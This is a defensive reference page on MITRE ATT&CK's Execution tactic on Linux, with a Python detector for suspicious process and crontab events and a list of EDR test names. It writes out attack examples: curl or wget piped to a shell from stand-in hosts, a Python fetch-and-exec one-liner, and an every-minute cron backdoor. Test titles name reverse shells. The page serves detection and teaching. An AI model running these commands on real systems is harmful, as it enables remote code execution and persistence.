Execution - TA0002

Objective:

  • Run malicious code on the compromised system to achieve operational goals. Execution consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data. For example, an adversary might use a remote access tool to run a PowerShell script that does Remote System Discovery.

  • ID: TA0002

    • https://attack.mitre.org/tactics/TA0002/


Linux Context:

Execution on Linux leverages its rich command-line ecosystem. Attackers execute payloads via bash, sh, or alternative shells like zsh, often chaining commands with pipes or redirects (e.g., curl http://evil.com/script.sh | bash). Legitimate utilities—wget, python, or perl—are abused to download and run code, blending into normal admin activity. Scheduled tasks via cron (e.g., crontab -e) or systemd timers ensure repeated execution, while attackers may exploit running services (e.g., injecting into httpd) to launch payloads. In cloud environments, compromised containers might execute malicious images pulled from Docker Hub. Fileless techniques that stage payloads in /dev/shm or run them through /proc/self/exe further complicate detection.


Key Techniques:

  • Command and Scripting Interpreter (T1059): Executing a malicious .sh file.

  • Scheduled Task/Job (T1053): Setting a cron job to run a backdoor every minute.

  • Native API (T1106): Calling execve() in a custom binary.


Flow Example:

  • An attacker runs wget -O- http://attacker.com/malware | sh to fetch and execute a script or adds * * * * * /bin/bash -c "/tmp/backdoor" to /etc/crontab.


Defender Strategies:

  • Monitor process creation and restrict execution permissions. Use EDR engines to detect anomalous command-line patterns.
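
As an added detection example (not part of the original page or of EDRmetry's test definitions), the Python below applies the Defender Strategies bullet to the Flow Example: it scans constructed process-creation events for a downloader piped into a shell, an interpreter one-liner that fetches and exec()s code, and programs launched from /tmp or /dev/shm, and it checks constructed /etc/crontab content for every-minute entries that point at such paths. The event record shape, the sample argv values and any hostname not already on the page are assumptions.

```python
import re
from typing import List, NamedTuple


class ProcEvent(NamedTuple):
    """One process-creation record, in the shape an EDR or auditd execve trace emits."""
    pid: int
    ppid: int
    uid: int
    argv: List[str]


# Constructed sample events (illustrative only, not taken from the original page).
# The first three mirror the Flow Example; the last two are benign admin activity.
SAMPLE_EVENTS = [
    ProcEvent(4120, 4100, 1000, ["bash", "-c", "wget -O- http://attacker.com/malware | sh"]),
    ProcEvent(4131, 4100, 1000, ["bash", "-c", "curl http://evil.com/script.sh | bash"]),
    ProcEvent(4140, 1, 0, ["/bin/bash", "-c", "/tmp/backdoor"]),
    ProcEvent(4155, 4100, 1000, ["python3", "-c",
                                 'import urllib.request as u; exec(u.urlopen("http://evil.com/p").read())']),
    ProcEvent(4160, 4100, 1000, ["wget", "-O", "/home/dev/release.tar.gz", "https://mirror.example/r.tar.gz"]),
    ProcEvent(4170, 4100, 1000, ["sh", "-c", "ls -la | grep conf"]),
]

DOWNLOADERS = r"(?:curl|wget|python[0-9.]*|perl|openssl)"
SHELLS = r"(?:sh|bash|zsh|dash|ksh)"
# Downloader stdout piped straight into a shell, e.g. `wget -O- URL | sh`.
PIPE_TO_SHELL = re.compile(rf"\b{DOWNLOADERS}\b[^|]*\|\s*(?:/bin/)?{SHELLS}\b")
# Interpreter one-liner that both fetches a URL and exec()s the response body.
INLINE_FETCH_EXEC = re.compile(r"(?=.*\bexec\b)(?=.*(?:\burlopen\b|requests\.get|LWP::UserAgent))")
# World-writable or tmpfs-backed locations; payloads staged here leave little on disk.
TMPFS_PREFIXES = ("/tmp/", "/dev/shm/", "/var/tmp/")


def _launched_programs(argv: List[str]) -> List[str]:
    """argv[0] plus the first word of a shell -c body, so `bash -c /tmp/x` is attributed to /tmp/x."""
    programs = list(argv[:1])
    if len(argv) >= 3 and argv[1] == "-c" and argv[2].split():
        programs.append(argv[2].split()[0])
    return programs


def analyze(event: ProcEvent) -> List[str]:
    """Return the reasons an event looks like adversary-controlled execution (empty if none)."""
    cmdline = " ".join(event.argv)
    reasons = []
    if PIPE_TO_SHELL.search(cmdline):
        reasons.append("download piped to shell")
    if INLINE_FETCH_EXEC.search(cmdline):
        reasons.append("inline fetch-and-exec in interpreter")
    if any(p.startswith(TMPFS_PREFIXES) for p in _launched_programs(event.argv)):
        reasons.append("execution from tmpfs/world-writable path")
    if reasons and event.uid == 0:
        reasons.append("runs as root")  # same behaviour, higher impact
    return reasons


def triage(events) -> dict:
    """Map pid -> reasons for every event that tripped at least one rule."""
    hits = {}
    for event in events:
        reasons = analyze(event)
        if reasons:
            hits[event.pid] = reasons
    return hits


# Constructed /etc/crontab content (system crontab format: schedule, user, command).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root /bin/bash -c "/tmp/backdoor"
"""


def scan_system_crontab(text: str) -> List[dict]:
    """Flag /etc/crontab entries that run every minute or launch from tmpfs paths."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or VAR=value assignment
        parts = line.split(None, 6)
        if len(parts) < 7:
            continue  # malformed entry; cron would reject it too
        schedule, user, command = " ".join(parts[:5]), parts[5], parts[6]
        reasons = []
        if schedule == "* * * * *":
            reasons.append("every-minute schedule")
        if any(prefix in command for prefix in TMPFS_PREFIXES):
            reasons.append("command references tmpfs/world-writable path")
        if reasons:
            findings.append({"line": lineno, "user": user, "command": command, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_EVENTS).items():
        print(f"pid {pid}: {', '.join(reasons)}")
    for hit in scan_system_crontab(SAMPLE_CRONTAB):
        print(f"crontab line {hit['line']} ({hit['user']}): {', '.join(hit['reasons'])}")
```

The rules deliberately key on the shape of the command line rather than on a URL or file name, so the two benign events (a plain wget to a home directory and a pipe into grep) pass while the three Flow Example variants trip; in production the same logic would read from the EDR's process telemetry and the cron check would also cover user crontabs under /var/spool/cron, which drop the user field.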


The current list of corresponding EDRmetry test definitions includes:

  • EDR-T6138 - Bash HTTP GET data with /dev/tcp

  • EDR-T6122 - Dump process memory via GDB

  • EDR-T6009 - eBPF system("whoami") Execution with bpftrace

  • EDR-T6025 - Encrypted ELF implant

  • EDR-T6094 - Establish Unix Socket connection

  • EDR-T6041 - Execute binary listening from a hidden directory as root

  • EDR-T6085 - Execute Linux Hack Tools

  • EDR-T6099 - Execute LKM call_usermodehelper() on ICMP

  • EDR-T6205 - Export proxy_http

  • EDR-T6039 - File Transfer to a hidden directory

  • EDR-T0003 - Install suspicious RPM package

  • EDR-T6086 - LKM Load/unload kernel module

  • EDR-T6051 - Modify core_pattern file

  • EDR-T6177 - MySQL UDF Command Execution

  • EDR-T6173 - OpenSSL - hackshell download without curl

  • EDR-T6174 - Perl - File download without curl

  • EDR-T6172 - Python - File download without curl

  • EDR-T6247 - Python GET File over Network

  • EDR-T6203 - Renice or Ulimit Execution

  • EDR-T6123.004 - Revshell mkfifo+nc

  • EDR-T6171 - Simplest Proc Name Masquerading

  • EDR-T6278 - Execute mknod/mkfifo

  • EDR-T6302 - K8S - Sidecar injection

  • EDR-T6379 - K8S - Exec into pod

  • EDR-T6340 - Python HTTP POST and Exec
